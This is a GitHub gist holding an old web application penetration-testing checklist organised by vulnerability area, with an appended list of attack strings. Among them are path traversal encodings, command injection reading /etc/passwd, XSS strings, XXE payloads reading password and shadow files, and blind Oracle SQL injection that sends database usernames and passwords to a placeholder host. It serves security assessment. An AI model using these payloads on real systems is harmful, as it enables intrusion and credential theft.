Created
March 20, 2019 22:54
-
-
Save wirepair/77501f1000ea1b5c704fdb7eabf3d825 to your computer and use it in GitHub Desktop.
super old pen-testing checklist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Attack Vector Checklist v1.2 Mar 23rd 2010 | |
----------------------------------- | |
target site: [ ] | |
user accounts: [ ] | |
/*****************************************************************************/ | |
/* AUTHENTICATION */ | |
/*****************************************************************************/ | |
1. Bypass transaction authentication by spoofing | |
------ | |
[ ] Attempt modification of user supplied parameters in accessing stored data | |
[ ] Attempt modifications of server side parameters that are used in | |
authentication checks. | |
2. Bypass transaction authentication by using alternate credentials/logic flows | |
------ | |
[ ] Attempted unauthorized access by changing the order of specific expected | |
application calls. | |
3. Bypass application authentication by alternate credentials | |
------ | |
[ ] Submission of modified credentials to bypass or manipulate LDAP query. | |
[ ] Submission of requests with modified sessions. | |
[ ] Submission of requests with modified session variables. | |
4. Bypass application authentication by directed browsing | |
------ | |
[ ] Submission of URL resources observed with different roles. | |
[ ] Submission of URL resources as authenticated user | |
[ ] Submission of URL resources as an anonymous user. | |
5. Bypass authentication checks in web service calls | |
------ | |
[ ] Submission of web service requests without credentials. | |
[ ] Submission of alternate credentials with web service requests. | |
6. Incremental or predictable user names. | |
------ | |
[ ] Identify if usernames incremental or otherwise predictable. | |
7. Bypass or manipulate application password reset functionality logic | |
------ | |
[ ] If password reset takes an email address, attempt to inject a different | |
e-mail address | |
Ex: real@account,another@account | |
Ex: another@account.com@real@account.com | |
Ex: real@account.com%0d%0aRCPT%20TO:another@account.com | |
8. Security question strength | |
------ | |
[ ] Determine if the same security question is asked every time | |
until a successful attempt is made, or a random question is selected | |
every time | |
9. Account Lockout Functionality | |
------ | |
[ ] Determine that multiple invalid login attempts cause the account to be | |
locked for a specified amount of time. (3 to 5 times) | |
Note: This should be tested at the END of the testing time frame in | |
the event that a manual process is required for account unlocking. | |
TECHNOLOGY SPECIFIC: | |
====== | |
J2EE: | |
[ ] Attempt to bypass VBAAC using HEAD requests to protected resources | |
Ex: HEAD /admin/adminpage.jsp?adduser=isaac HTTP/1.0 | |
Reference: | |
www.aspectsecurity.com/documents/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf | |
/*****************************************************************************/ | |
/* ACCESS CONTROL */ | |
/*****************************************************************************/ | |
1. Parameter manipulation in the application | |
------ | |
[ ] Modification of parameters to known good values for another role. | |
[ ] Add user identifier parameters to pages which do not have them. | |
Ex: /userfiles.jsp?fileid=1 | |
/userfiles.jsp?fileid=1&userid=1 | |
[ ] Modification of parameters to include LDAP specific characters. | |
[ ] Modification of parameters to include SQL specific characters. | |
[ ] Modification of XML requests. | |
[ ] Modification of web service requests. | |
2. Context switching | |
------ | |
[ ] Check for re-use of session IDs when logging out/into application. | |
[ ] Test privileges of user roles between communities. | |
[ ] Proxy User ability can not be used to proxy to unauthorized accounts. | |
3. Inherited privilege roles | |
------ | |
[ ] Test creation of new roles. | |
[ ] Test unauthorized access to roles during creation process. | |
[ ] Test for controls when granting specific data access to users. | |
4. Insufficient privilege dropping | |
------ | |
[ ] Test logout process for a session. | |
5. Cross Site Request Forgery | |
------ | |
[ ] Verify the application requires a non-deterministic value when making to | |
the system. This value can not be a cookie and should be sent as a | |
parameter. | |
/*****************************************************************************/ | |
/* CONFIGURATION/ENVIRONMENT */ | |
/*****************************************************************************/ | |
1. Unencrypted communication channels | |
------ | |
[ ] Attempt to force the application to communicate over unencrypted channels. | |
2. Weak password requirements | |
------ | |
[ ] Attempt to set insecure passwords. | |
[ ] Change password form requires previous password. | |
3. Administrative interface access | |
------ | |
[ ] Attempt unauthorized/unauthenticated connections to administrative | |
interfaces. | |
4. Test/QA functionality | |
------ | |
[ ] Review application for QA programs. | |
[ ] Test external services for test/QA functionality. | |
[ ] Test for existence of robots.txt | |
5. Debug information | |
------ | |
[ ] Review web pages for debug information present in source. | |
[ ] Search test system for accessible debug information. | |
6. Weak CAPTCHA implementation | |
------ | |
[ ] Review captcha implementation to determine if value is predictable | |
[ ] Re-use previously successful captcha value on a subsequent request. | |
[ ] Sample and analyze CAPTCHA values to determine structure and search space. | |
Note: Open source tools exist for testing CAPTCHA systems: | |
- PWNtcha, The Captcha Breaker, Captcha decoder, Online Captcha Decoder | |
7. Dangerous HTTP Verbs | |
------ | |
[ ] Determine if dangerous HTTP verbs such as CONNECT, TRACE, PUT are allowed. | |
[ ] Attempt dangerous HTTP verbs using HTTP/1.0, and without a Host: header. | |
8. Default Error Pages | |
------ | |
[ ] Determine if the default 4xx and 5xx error pages are viewable and leak | |
information about the running environment. | |
/*****************************************************************************/ | |
/* CRYPTOGRAPHY */ | |
/*****************************************************************************/ | |
1. Insufficient algorithmic entropy | |
------ | |
[ ] Review configuration and ciphers available and used by the system. | |
[ ] Search for any non-standard or insecure ciphers used by the system. | |
2. Hard coded keys | |
------ | |
[ ] Search code for accessible encryption keys. | |
3. Small key space | |
------ | |
[ ] Review the size of keys used by the system. | |
4. Reflective attacks | |
------ | |
[ ] Search applications for the exposure of cryptographic material. | |
[ ] Look for opportunities to have the system generate cryptographic | |
text controlled by the attacker. | |
5. Insecure encryption modes | |
------ | |
[ ] If it is possible to determine the cipher in use, verify insecure modes | |
such as ECB mode are not in use. | |
/*****************************************************************************/ | |
/* DATA EXPOSURE */ | |
/*****************************************************************************/ | |
1. Passwords exposed | |
------ | |
[ ] Search for passwords in system scripts. | |
[ ] Search for passwords returned to the user in the application. | |
2. Accessible source code | |
------ | |
[ ] Search for accessible source code on the system | |
[ ] Submission of special characters through the web interface to confuse the | |
web and application server into returning unprocessed source code. | |
[ ] Attempt direct access to config files and binaries through the external | |
interfaces. | |
3. Verbose comments | |
------ | |
[ ] Review application pages for descriptive developer comments. | |
4. Dead code present on system | |
------ | |
[ ] Search operating system for accessible dead or backup code | |
[ ] Review application pages for references/presence of dead code. | |
5. Sensitive information stored unencrypted | |
------ | |
[ ] Search application for sensitive information in accessible in | |
temporary files, log files or in configuration files. | |
6. Verbose error messages | |
------ | |
[ ] Submission of unexpected user input to generate error conditions and | |
messages from the server; | |
[ ] Submission of incorrect login information to generate login errors; | |
[ ] Submission of file extensions to trigger application server specific | |
error messages; | |
[ ] Submission of LDAP specific characters to generate LDAP error messages. | |
/*****************************************************************************/ | |
/* DATA VALIDATION */ | |
/*****************************************************************************/ | |
1. Path traversal in file upload functionality | |
------ | |
[ ] Attempt to reference specific files in header files and in | |
source/destination; | |
[ ] Attempt to append additional files for transfer; | |
[ ] Attempt to modify the file request to avoid any possible filtering; | |
[ ] Modify requests with relative paths. | |
2. Path traveresal in application | |
------ | |
[ ] Attempt relative paths in file requests | |
[ ] Attempt alternate encodings of file requests. | |
Ex: Generic Traversal Attacks: | |
/../../ | |
/./../././.././ | |
/....//....// | |
\..\..\ | |
\.\..\.\.\..\.\ | |
\....\\....\\ | |
Ex: Double Encoded | |
/%252e%252e/%252e%252e/ | |
/%252e./%252e./ | |
/.%252e/.%252e/ | |
/%252e./.%252e/ | |
/.%252e/%252e./ | |
/%%32e%%32e/%%32e%%32e/ | |
/%25%32e%25%32e/%25%32e%25%32e/ | |
/..%252f../ | |
/..%255c../ | |
/..%%35c../ | |
/..%%32f../ | |
/..%25%35%63../ | |
/..%25%32%66../ | |
Ex: Overlong Invalid UTF-8 Sequences: | |
/..%c0%af../ | |
/..%c0%2f../ | |
/..%c1%9c../ | |
/..%c1%1c../ | |
/%c0%ae%c0%ae/%c0%ae%c0%ae/ | |
/%c0%2e%c0%2e/%c0%2e%c0%2e/ | |
/..%e0%80%af../ | |
/..%f0%80%80%af../ | |
/..%f8%80%80%80%af../ | |
/..%fc%80%80%80%80%af../ | |
3. Command injection in application | |
------ | |
[ ] Attempt to bypass filters submitting commands as part of shell calls | |
made by the application | |
Ex: ` | && ; | |
[ ] Attempt to change application commands in requests. | |
Ex: file.pl?doc=/bin/ls| | |
Ex: file.pl?dir=;cat /etc/passwd | |
4. XSS in web interfaces | |
------ | |
[] Submit active script into user supplied input; | |
Ex: <script>alert(123)</script> | |
Ex: <%00script>alert(123)</script> | |
Ex: <img src="javascript:alert(123)"> | |
Ex: ';alert(123); | |
Ex: \';alert(123); | |
[ ] Attempt to bypass filters with different character encodings; | |
[ ] Search for scripting making direct use of user input. | |
Note: This may include areas of the DOM such as document.location.href, | |
window.location,document.URL etc, which can be abused by injecting script | |
directly into the URI query or URI fragment. | |
Ex: blah.jsp#<script>alert(document.cookie)</script> | |
5. SQL Injection | |
------ | |
[ ] Include SQL relevant characters in user input | |
Ex: ' , " ) % %25 ' OR 1=1-- | |
[ ] Submit valid SQL in header fields to inject into possible logging | |
processes. | |
[ ] Submit valid SQL statements in an attempt to have the system call back | |
in the event the injection vector does not return results. (Blind) | |
Ex (Oracle): '+||+UTL_HTTP.REQUEST('http://<yourip>/SqlTest')||'-- | |
6. LDAP injection in auth process | |
------ | |
[ ] Include LDAP relevant characters in username, password and region fields | |
for login requests; | |
Ex: ' ) * | $ & | |
[ ] Attempt to modify LDAP queries used in authentication to match wildcards. | |
Ex: uname=userA)(uid=*) | |
Ex: uname=userA)(&)) | |
Reference: | |
http://www.blackhat.com/presentations/bh-europe-08/ | |
Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf | |
7. CRLF injection in web interfaces | |
------ | |
[ ] Attempt to input CRLF content with user input | |
[ ] Attempt injection in application redirection flows | |
8. Parameter manipulation in web interfaces | |
------ | |
[ ] Modify user input to modify web requests | |
[ ] Modify user input to modify Location/redirection. (URL Injection) | |
[ ] Test edge cases for input types | |
9. Code injection in any service | |
------ | |
[ ] Identify possible injection points in web service, file service, | |
and backend system calls through fuzzing process. | |
Ex: file.php?func=echo+hi; | |
Ex: file.php?func=;system("/bin/ls"); | |
10. CSRF in web interfaces | |
------ | |
[ ] Review web interface request structure to determine if | |
non-deterministic values/tokens are used in requests. | |
11. XML Injection | |
------ | |
[ ] Include relevant XML characters in requests to the system also attempt | |
to inject unbalanced XML tags. | |
Ex: <!-- < ' > ]]> <![CDATA[ | |
Ex (XSS): | |
<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]> | |
[ ] If parsing of user supplied XML data attempt to inject various invalid | |
XML formats. | |
Ex (Local file reading): | |
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY > | |
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> | |
Reference: | |
http://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008) | |
TECHNOLOGY SPECIFIC | |
====== | |
1. Web Services Testing | |
------ | |
[ ] Identify any WSDL or other web service definition files. | |
Ex: | |
http://<webservice-host>:<port>/<servicename> | |
http://<webservice-host>:<port>/<servicename>.wsdl | |
http://<webservice-host>:<port>/<servicename>?wsdl | |
http://<webservice-host>:<port>/<servicename>.aspx?wsdl | |
http://<webservice-host>:<port>/<servicename.dll>?wsdl | |
http://<webservice-host>:<port>/<servicename.exe>?wsdl | |
http://<webservice-host>:<port>/<servicename.php>?wsdl | |
http://<webservice-host>:<port>/<servicename.pl>?wsdl | |
http://<webservice-host>:<port>/<servicename.dll>?disco | |
http://<webservice-host>:<port>/<servicename.exe>?disco | |
http://<webservice-host>:<port>/<servicename.php>?disco | |
http://<webservice-host>:<port>/<servicename.pl>?disco | |
http://<webservice-host>:<port>/axis/services/<servicename>?wsdl | |
http://<webservice-host>:<port>/axis/services/<service-name> | |
http://<webservice-host>:<port>/<servlets>/<servicename>?wsdl | |
http://<webservice-host>:<port>/<servlets>/<service-name> | |
2. Cross-Site Flashing | |
------ | |
[ ] By using FLARE decompile flash movies and determine if the following | |
methods exist as they are known to be vulnerable to XSF attacks. | |
loadVariables() | |
loadMovie() | |
getURL() | |
loadMovie() | |
loadMovieNum() | |
FScrollPane.loadScrollContent() | |
LoadVars.load | |
LoadVars.send | |
XML.load ( 'url' ) | |
LoadVars.load ( 'url' ) | |
Sound.loadSound( 'url' , isStreaming ); | |
NetStream.play( 'url' ); | |
flash.external.ExternalInterface.call(_root.callback) | |
htmlText | |
asfunction | |
*The below example assumes the URL variable is defined. | |
Ex: http://victim/file.swf?URL=asfunction:getURL,javascript:alert(123); | |
Reference: | |
http://www.owasp.org/index.php/Testing_for_Cross_site_flashing_(OWASP-DV-004) | |
/*****************************************************************************/ | |
/* DATA HANDLING */ | |
/*****************************************************************************/ | |
1. Buffer overflows in accessible services | |
------ | |
[ ] Generate varied length strings submitted through different input to | |
generate errors/failures in services. | |
2. Heap overflows in accessible services | |
------ | |
[ ] Submit varied length strings for user supplied data to surface any | |
error/failure in services. | |
3. Format string attacks in accessible services | |
------ | |
[ ] Submit format strings to services to generate error conditions. | |
Ex: %x %25x %p %04d | |
4. Alternate character encodings | |
------ | |
[ ] Submit data with different character encodings to bypass filtering. | |
5. Data truncation | |
------ | |
[ ] Submit varied length strings to filtered content to check for proper | |
validation and truncation processes. | |
6. Integer overflows/underflows | |
------ | |
[ ] Submit edge cases for integer values to surface any potential integer | |
overflow/underflow conditions in the application logic. | |
Ex: 128, 129, 256, 257, 32768, 32769, 65536, 65537, 2147483648, 2147483649 | |
4294967296, 4294967297 | |
Reference: | |
signed char -128 127 | |
unsigned char 0 255 | |
short -32768 32767 | |
unsigned short 0 65535 | |
int -2147483648 2147483647 | |
unsigned int 0 4294967295 | |
long -2147483648 2147483647 | |
unsinged long 0 4294967295 | |
long long -9223372036854775808 9223372036854775807 | |
unsigned long 0 18446774073709551615 | |
/*****************************************************************************/ | |
/* ERROR REPORTING */ | |
/*****************************************************************************/ | |
1. DB errors exposed | |
------ | |
[ ] Modify user supplied input to include erroneous DB input | |
2. Stack traces returned to the user | |
------ | |
[ ] Modify user input and look for stack traces in error messages, header | |
parameters or in page source returned to the user. | |
3. System errors exposed to the user | |
------ | |
[ ] Review error messages returned to the user for the presence of system error | |
messages. | |
4. Authentication error messages | |
------ | |
[ ] Review failed login attempts for descriptive error messages. | |
/*****************************************************************************/ | |
/* SESSION MANAGEMENT */ | |
/*****************************************************************************/ | |
1. Session fixation attacks | |
------ | |
[ ] Attempt to preset session in login call; | |
[ ] Attempt to preset session in cookie; | |
[ ] Attempt to pre set session in parameters. | |
2. Insecure cookie creation | |
------ | |
[ ] Review all cookie creation calls from the server. | |
3. Insecure cookie usage | |
------ | |
[ ] Validate cookie information is not used in displaying content back to the | |
user. | |
- Add cookie to uri (url rewriting format): | |
/file.jsp;errcookie=<script>alert(123)</script> | |
4. Session IDs predictable | |
------ | |
[ ] Sample and analyze sessionID for randomness in session ID creation process. | |
*Burp Sequencer has a decent tool built in for session id analysis | |
5. Session IDs searchable | |
------ | |
[ ] Sample and analyze sessionIDs to determine structure and search space. | |
6. Long lived session IDs | |
------ | |
[ ] Attempt to reuse sessions at 30 min, 1 hour, 24 hour intervals. | |
7. Insecure logout functionality | |
------ | |
[ ] Determine if session is deleted serverside as well as client side. | |
(Intercept logout page and remove the Set-Cookie header which is attempting | |
to nullify the value) | |
+-----------------------------------------------------------------------------+ | |
| VARIOUS ATTACK STRINGS | | |
+-----------------------------------------------------------------------------+ | |
==========================SQL Injection (Oracle)=============================== | |
Get table info: | |
SELECT table_name FROM all_tables WHERE TABLESPACE_NAME='USERS' | |
Get column info of a specific table: | |
SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME' | |
Get database name: | |
SELECT name FROM v$database | |
Get the name of the database we are currently in: | |
SELECT global_name FROM global_name | |
Get the database usernames and passwords: | |
SELECT username,password FROM dba_users; | |
Get the database server version information: | |
SELECT banner||'-'||(SELECT banner FROM v$version WHERE banner LIKE 'Oracle%') | |
FROM v$version WHERE banner LIKE 'TNS%' | |
Similiar to above: | |
SELECT product FROM product_component_version | |
SELECT version FROM product_component_version | |
Get the current database user: | |
SELECT user FROM dual | |
Same as above: | |
SELECT username FROM v$session WHERE audsid=sys_context('userenv','SESSIONID') | |
AND rownum=1 | |
Search for a specific table name using LIKE keyword: | |
(Search for a table that contains ...AUTH...) | |
SELECT table_name FROM dba_tab_columns WHERE table_name LIKE '%25AUTH%25' | |
For Blind Oracle SQL Injection: | |
When using UTL_HTTP.REQUEST you must have an HTTP server running on | |
your machine to log the results. | |
Get user: | |
'+||+UTL_HTTP.REQUEST('http://ip.ip.ip.ip/sql.php?SQL='||(select | |
concat(username,password) from dba_users))||'-- | |
Same as above but using || to concatenate instead of concat(): | |
'+||+UTL_HTTP.REQUEST('http://ip.ip.ip.ip/sql.php?SQL='||(select | |
ID||':'||PWD from TABLE where rownum=1))||'-- | |
==============================XML Injection===================================== | |
count(/child::node()) | |
x' or name()='username' or 'x'='y | |
<name>','')); phpinfo(); exit;/*</name> | |
<![CDATA[<script>var n=0;while(true){n++;}</script>]]> | |
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> | |
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<foo> | |
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> | |
</foo> | |
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<foo> | |
<![CDATA[' or 1=1 or ''=']]> | |
</foo> | |
External Entity Inclusion 1: | |
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY> | |
<!ENTITY xxe SYSTEM "file://c:/boot.ini">]> | |
<foo>&xxe;</foo> | |
External Entity Inclusion 2: | |
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY> | |
<!ENTITY xxe SYSTEM "file:////etc/passwd">]> | |
<foo>&xxe;</foo> | |
External Entity Inclusion 3: | |
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY> | |
<!ENTITY xxe SYSTEM "file:////etc/shadow">]> | |
<foo>&xxe;</foo> | |
External Entity Inclusion 4: BECAREFUL THIS WILL DOS THE SYSTEM!!!!!!!!!!! | |
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY> | |
<!ENTITY xxe SYSTEM "file:////dev/random">]> | |
<foo>&xxe;</foo> | |
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> | |
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml> | |
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> | |
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> | |
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> | |
TODO: Add More... |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment